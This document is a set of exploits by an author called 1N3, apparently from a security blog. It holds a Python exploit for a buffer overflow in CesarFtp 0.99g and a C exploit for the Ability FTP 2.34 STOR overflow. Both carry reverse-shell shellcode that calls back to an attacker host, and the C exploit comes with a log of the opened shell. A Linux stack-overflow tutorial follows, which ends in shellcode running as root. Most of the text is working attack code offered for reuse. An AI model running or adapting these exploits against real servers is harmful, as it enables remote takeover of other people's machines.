CesarFtp 0.99g Buffer Overflow Exploit

#!/usr/bin/python
#CesarFtp 0.99g Buffer Overflow Exploit by 1N3 @ treadstonesecurity.blogspot.ca
#Uses Metasploit's exploit/multi/handler reverse meterpreter shellcode to gain remote access to the target. Replace as needed.

from socket import *

shellcode = ( # reverse meterpreter shell 4444
"\xbb\x9c\x7e\x21\x9b\xdb\xca\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x18\x31\x5a\x13\x83\xc2\x04\x03\x5a\x93\x9c\xd4\x67\x9a\xbb"
"\x73\x13\x9f\x0b\xf7\x63\x13\xe7\x57\x78\xa0\xe5\xdc\xf2\x96"
"\xa4\x4e\xbc\xd5\xb0\xad\x73\xea\xe3\xff\x06\xe3\x97\x6a\xe1"
"\x70\xe2\x56\x7a\xca\xe8\xde\xf7\x9e\xff\x02\x09\xf7\x8b\x7a"
"\x51\x06\x64\xf7\x10\x34\x75\xe6\xd0\x2d\x79\xa5\xbc\xac\xeb"
"\x4b\xbe\x7e\x7c\x23\x80\xd6\x94\xbe\x68\x24\x9b\xaf\x34\xa1"
"\x7a\x9c\x73\xbd\x2f\x72\x2b\xec\xa5\x64\x82\x59\x6c\x7a\xc1")

def intel_order(i):
    a = chr(i % 256)
    i = i >> 8
    b = chr(i % 256)
    i = i >> 8
    c = chr(i % 256)
    i = i >> 8
    d = chr(i % 256)
    str = "%c%c%c%c" % (a, b, c, d)
    return str

host = "192.168.23.112"
port = 21
user = "ftp"
password = "ftp"
#EIP = 0x77D718FC #jmp esp <user32.dll XP SP1 english>
EIP = 0x76AA679b #jmp esp <metasploit module>

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + shellcode
buffer += "\r\n"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

Ability FTP Server 2.34 STOR Buffer Overflow Exploit

/*
Ability FTP 2.34 STOR Buffer Overflow Exploit by 1N3
Reverse shell payload 192.168.16.151 port 443
http://treadstonesecurity.blogspot.com

NOTE: Replace shellcode and return address for other IP's/OS platforms...

msf exploit(handler) > run

[*] Started reverse handler on 192.168.16.151:443
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.17.17
[*] Command shell session 4 opened (192.168.16.151:443 -> 192.168.17.17:1087) at 2014-01-01 12:02:29 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\abilitywebserver>
*/

#include <string.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>

// JMP ESP USER32.DLL WinXPSP2 ENG
// 77D8AF0A OR \x0a\xaf\xd8\x77

char returnaddr[]="\x0a\xaf\xd8\x77";
char noop_sled[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char shellcode[]="\xdb\xdd\xd9\x74\x24\xf4\x58\xba\x45\x17\xd4\x0c\x2b\xc9\xb1\x49\x31\x50\x19\x03\x50\x19\x83\xc0\x04\xa7\xe2\x28\xe4\xae\x0d\xd1\xf5\xd0\x84\x34\xc4\xc2\xf3\x3d\x75\xd2\x70\x13\x76\x99\xd5\x80\x0d\xef\xf1\xa7\xa6\x45\x24\x89\x37\x68\xe8\x45\xfb\xeb\x94\x97\x28\xcb\xa5\x57\x3d\x0a\xe1\x8a\xce\x5e\xba\xc1\x7d\x4e\xcf\x94\xbd\x6f\x1f\x93\xfe\x17\x1a\x64\x8a\xad\x25\xb5\x23\xba\x6e\x2d\x4f\xe4\x4e\x4c\x9c\xf7\xb3\x07\xa9\xc3\x40\x96\x7b\x1a\xa8\xa8\x43\xf0\x97\x04\x4e\x09\xdf\xa3\xb1\x7c\x2b\xd0\x4c\x86\xe8\xaa\x8a\x03\xed\x0d\x58\xb3\xd5\xac\x8d\x25\x9d\xa3\x7a\x22\xf9\xa7\x7d\xe7\x71\xd3\xf6\x06\x56\x55\x4c\x2c\x72\x3d\x16\x4d\x23\x9b\xf9\x72\x33\x43\xa5\xd6\x3f\x66\xb2\x60\x62\xef\x77\x5e\x9d\xef\x1f\xe9\xee\xdd\x80\x41\x79\x6e\x48\x4f\x7e\x91\x63\x37\x10\x6c\x8c\x47\x38\xab\xd8\x17\x52\x1a\x61\xfc\xa2\xa3\xb4\x52\xf3\x0b\x67\x12\xa3\xeb\xd7\xfa\xa9\xe3\x08\x1a\xd2\x29\x21\xb0\x28\xba\x8e\xec\x23\xad\x67\xee\x43\xd0\xcc\x67\xa5\xb8\x22\x21\x7d\x55\xda\x68\xf5\xc4\x23\xa7\x73\xc6\xa8\x4b\x83\x89\x58\x26\x97\x7e\xa9\x7d\xc5\x29\xb6\xa8\x60\xd6\x22\x56\x23\x81\xda\x54\x12\xe5\x44\xa7\x71\x7d\x4c\x3d\x3a\xea\xb1\xd1\xba\xea\xe7\xbb\xba\x82\x5f\x9f\xe8\xb7\x9f\x0a\x9d\x6b\x0a\xb4\xf4\xd8\x9d\xdc\xfa\x07\xe9\x43\x04\x62\xeb\xb8\xd3\x4b\x69\xc8\x51\xb8\xb1";

// CONNECT TO FTP SERVER
int conn(char *host, u_short port)
{
    int sock = 0;
    struct hostent *hp;
    WSADATA wsa;
    struct sockaddr_in sa;

    WSAStartup(MAKEWORD(2,0), &wsa);
    memset(&sa, 0, sizeof(sa));

    hp = gethostbyname(host);
    if (hp == NULL) {
        printf("x--==[ gethostbyname() error!\n"); exit(0);
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)      {
        printf("x--==[ Socket\n");
        exit(0);
        }
    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
        {printf("x--==[ Connect() error!\n");
        exit(0);
          }
    printf("x--=[ Connected to %s\n", host);
    return sock;
}

// LOGIN AND SEND BUFFER TO FTP SERVER
void login(int sock, char *login, char *pass)
{

char ubuf[1000], pbuf[1000], rc[200];
int i;
char buffer[2000], final_buffer[2000];
      memset(buffer, 0x00, 2000); // CLEAR OUT BUFFER
      memset(buffer, 0x41, 965); // ADD 0x41 (A's) * 965 TO FILL UP INITIAL BUFFER
      memcpy(buffer+strlen(buffer), &returnaddr, sizeof(returnaddr)); // RETURN ADDRESS
      memcpy(buffer+strlen(buffer), &noop_sled, sizeof(noop_sled)); // COPY NOOP SLED
      memcpy(buffer+strlen(buffer), &shellcode, sizeof(shellcode)); // COPY SHELLCODE TO BUFFER

      sprintf(final_buffer, "STOR %s\r\n", buffer); // COPY STOR COMMAND TO BUFFER
      // puts(final_buffer);

      if ( strlen(pass) >= 100 )  { printf("2 long password!\n"); exit(0); }
      if ( strlen(login) >= 100 ) { printf("2 long login!\n"); exit(0);    }

      Sleep(2000);
      printf("x--=[ Sending USER...");
      sprintf(ubuf, "USER %s\r\n", login);
      send(sock, ubuf, strlen(ubuf), 0);
      printf("OK!\n");

      Sleep(2000);
      printf("x--=[ Sending PASS...");
      sprintf(pbuf, "PASS %s\r\n", pass);
      send(sock, pbuf, strlen(pbuf), 0);
      recv(sock, rc, 200, 0);
      if ( strstr(rc, "530")) {printf("Bad password!\n"); exit(0); }
      printf("OK!\n");

      Sleep(2000);
      printf("x--=[ Sending exploit...");
      send(sock, final_buffer, strlen(final_buffer), 0); // FINAL BUFFER TO SEND
      Sleep(2000);
      printf("OK!\n");
      printf("x--=[ Wait for reverse shell port 443 TCP...\n");

      Sleep(4000);
      printf("x--=[ Done!\n\n");

}

int main(int argc, char **argv)
{
    int sock = 0;
    int data;
    printf("\n--==[ Ability FTP Server <= 2.34 Exploit ]==--\n");
    printf("--==[ by Treadstone Security Group - 1N3 ]==--\n--==[ http://treadstonesecurity.blogspot.com ]==--\n");

    if ( argc < 4 ) { printf("--==[ Usage: ability_ftp_server_exploit.exe <host> <username> <password>\n\n"); exit(0); }

    sock = conn(argv[1], 21);
    login(sock, argv[2], argv[3]);
    closesocket(sock);
    Sleep(2000);

    return 0;
}

Linux Buffer Overflow Tutorial

LINUX BUFFER OVERFLOW TUTORIAL BY 1N3

                          
      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          

# OVERVIEW
This tutorial covers the basics of exploiting buffer overflows on Linux x86 platforms. Tested on BackTrack 5R3 Linux 3.2.6 i686 GNU/Linux.

# CREATE A VULNERABLE C APP THAT ACCEPTS USER INPUT WITH A TOTAL BUFFER OF 100 BYTES BUT NO BOUNDS CHECKING...
########################## test.c
#include <unistd.h>

int main(int argc, char *argv[])
{
    char buff[100];
    if(argc <2)
    {
        printf("Syntax: %s <input string>\n", argv[0]);
        exit (0);
    }
    strcpy(buff, argv[1]);
    return 1;
}

# COMPILING 
gcc test.c -fno-stack-protector -z execstack -o test.o

# DISABLE MEMORY RANDOMIZATION

echo 0 > /proc/sys/kernel/randomize_va_space

# DEBUG THE APPLICATION
gdb test.o

(gdb) disass main
Dump of assembler code for function main:
   0x08048454 <+0>:    push   %ebp
   0x08048455 <+1>:    mov    %esp,%ebp
   0x08048457 <+3>:    and    $0xfffffff0,%esp
   0x0804845a <+6>:    add    $0xffffff80,%esp
   0x0804845d <+9>:    cmpl   $0x1,0x8(%ebp)
   0x08048461 <+13>:    jg     0x8048484 <main+48>
   0x08048463 <+15>:    mov    0xc(%ebp),%eax
   0x08048466 <+18>:    mov    (%eax),%eax
   0x08048468 <+20>:    mov    %eax,0x4(%esp)
   0x0804846c <+24>:    movl   $0x8048570,(%esp)
   0x08048473 <+31>:    call   0x8048374 <printf@plt>
   0x08048478 <+36>:    movl   $0x0,(%esp)
   0x0804847f <+43>:    call   0x8048384 <exit@plt>
   0x08048484 <+48>:    mov    0xc(%ebp),%eax
   0x08048487 <+51>:    add    $0x4,%eax
   0x0804848a <+54>:    mov    (%eax),%eax
   0x0804848c <+56>:    mov    %eax,0x4(%esp)
   0x08048490 <+60>:    lea    0x1c(%esp),%eax
   0x08048494 <+64>:    mov    %eax,(%esp)
   0x08048497 <+67>:    call   0x8048364 <strcpy@plt>
   0x0804849c <+72>:    mov    $0x1,%eax
   0x080484a1 <+77>:    leave
   0x080484a2 <+78>:    ret   
End of assembler dump.

# SET BREAKPOINTS
(gdb) break *0x08048497
Breakpoint 1 at 0x8048497
(gdb) break *0x0804849c
Breakpoint 2 at 0x804849c
(gdb) break *0x080484a1
Breakpoint 3 at 0x80484a1

# FUZZ THE APPLICATION, OVERWRITE THE BUFFER AND CHECK IF ANY REGISTERS ARE OVERWRITTEN...
(gdb) r "`perl -e 'print "A"x120'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "A"x120'`"
Breakpoint 1, 0x08048497 in main ()

# REGISTERS BEFORE USER INPUT
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x85b7641f    -2051578849
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Breakpoint 2, 0x0804849c in main ()
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x804849c    0x804849c <main+72>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

# CHECK EAX REGISTER FOR A's (0x41)...
(gdb) x/16xb $eax
0xbffff72c:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff734:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41

Breakpoint 3, 0x080484a1 in main ()
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x80484a1    0x80484a1 <main+77>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

(gdb) step
Single stepping until exit from function main,
which has no line number information.
Warning:
Cannot insert breakpoint 0.
Error accessing memory address 0x41414141: Input/output error.

0x41414141 in ?? ()
(gdb)

# EBP AND EIP ARE OVERWRITTEN WITH A'S (0x41414141)
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff7a0    0xbffff7a0
ebp            0x41414141    0x41414141
esi            0x0    0
edi            0x0    0
eip            0x41414141    0x41414141
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)


# Find which bytes overwrite EIP and EBP. change EBP to normal EBP before buffer and point EIP to beginning of EAX...

# EIP prior to user input
EIP 0xbffff72c

# EBP prior to user input
EBP  0xbffff798


# CREATE UNIQUE PATTERN TO FIND EIP/EBP OVERWRITE...
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 120
[*] exec: ruby pattern_create.rb 120
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9



# FUZZ TEST.C WITH UNIQUE PATTERN TO FIND REGISTER OFFSET VALUES
(gdb) r "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Breakpoint 1, 0x08048497 in main ()

(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x72698d95    1919520149
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

Program received signal SIGSEGV, Segmentation fault.
0x64413764 in ?? ()
(gdb)


# FIND EIP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 64413764
[*] exec: ruby pattern_offset.rb 64413764
[*] Exact match at offset 112


# FIND EBP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 41366441
[*] exec: ruby pattern_offset.rb 41366441
[*] Exact match at offset 108


# CREATE SHELLCODE USING METASPLOIT TO RUN THE LINUX COMMAND 'whoami'...
msf exploit(ms06_040_netapi) > msfvenom -p linux/x86/exec CMD=whoami -b "x00" -e x86/shikata_ga_nai

[*] x86/shikata_ga_nai succeeded with size 69 (iteration=1)
buf =
"\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9" +
"\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28" +
"\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad" +
"\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51" +
"\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36"

# EIP LITTLE ENDIAN
EIP 0xbffff72c
\x2c\xf7\xff\xbf

# EBP LITTLE ENDIAN
EBP  0xbffff798
\x98\xf7\xff\xbf


# CONSTRUCT BUFFER/EXPLOIT
total buff = 116
EIP = 4
EBP = 4
shellcode = 69
noops = 39


buffer = noops + shellcode + noops + ebp + eip
/================================================\
||116 *** 19 ****** 69 ******* 20 ***** 4 **** 4||
\================================================/

# RUN EXPLOIT...
(gdb) r "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
process 16807 is executing new program: /bin/bash
process 16807 is executing new program: /usr/bin/whoami
root

Program exited normally.
(gdb)